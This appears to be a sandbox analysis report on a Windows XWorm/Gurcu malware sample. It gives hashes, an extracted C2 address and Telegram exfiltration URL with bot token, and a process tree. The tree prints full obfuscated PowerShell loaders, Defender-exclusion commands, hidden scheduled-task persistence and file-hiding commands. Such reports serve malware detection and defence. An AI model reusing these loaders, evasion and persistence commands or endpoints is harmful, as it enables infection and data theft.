Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-08-2024 14:45

General

  • Target

    fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe

  • Size

    19.2MB

  • MD5

    aa4bb4c57074e543076b145b7399cd64

  • SHA1

    5e36e64cc686fa553b43d1c274d1a15e18b50501

  • SHA256

    fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7

  • SHA512

    ff38fc85d51fda9d32668949d2f67074be1e52cb6d63978155347173452199687935b9e96d3a060c7ab74461c5f4228b2c4cf8a0486ca5bbd9ea962a1c16c5eb

  • SSDEEP

    393216:0W7LVQgX47mXZGbWVQjFLICQA122lrL8jiQIthY4eqfIgUJzM8/bX9Wwy:NBfXZGbBjFLICB1hUji1tWbZT9W/

Malware Config

Extracted

Family

xworm

C2

floor-talked.gl.at.ply.gg:52348

Attributes
  • Install_directory

    %AppData%

  • install_file

    processor.exe

  • telegram

    https://api.telegram.org/bot6944368626:AAEvUk2RtxxeA2BAieiHfX1ijoOaWr__RyY/sendMessage?chat_id=6270056635

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6944368626:AAEvUk2RtxxeA2BAieiHfX1ijoOaWr__RyY/sendMessage?chat_id=6270056635

Signatures

  • Detect Xworm Payload 1 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe
    "C:\Users\Admin\AppData\Local\Temp\fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3380
    • C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
      "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4300
      • C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        3⤵
        • Executes dropped EXE
        PID:3172
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4744
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2124
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:228
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_166_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_166.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:1800
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_166.vbs"
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:956
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_166.bat" "
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4952
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_166.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:2744
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1340
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4788
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:456
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_58_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_58.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:4844
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_58.vbs"
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2984
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_58.bat" "
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1488
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_58.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4296
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4116
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2652
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_85_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_85.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5088
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_85.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:800
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_85.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:976
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_85.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Drops startup file
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:2956
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2564
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4552
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_531_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_531.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2476
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_531.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3028
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_531.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4864
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_531.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3548
              • C:\Windows\System32\attrib.exe
                "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\system"
                7⤵
                • Sets file to hidden
                • Views/modifies file attributes
                PID:4084
              • C:\Windows\System32\attrib.exe
                "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\system\system.exe"
                7⤵
                • Sets file to hidden
                • Views/modifies file attributes
                PID:4992
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFA1F.tmp.bat""
                7⤵
                  PID:4764
                  • C:\Windows\system32\timeout.exe
                    timeout 3
                    8⤵
                    • Delays execution with timeout.exe
                    PID:4752
                  • C:\Users\Admin\system\system.exe
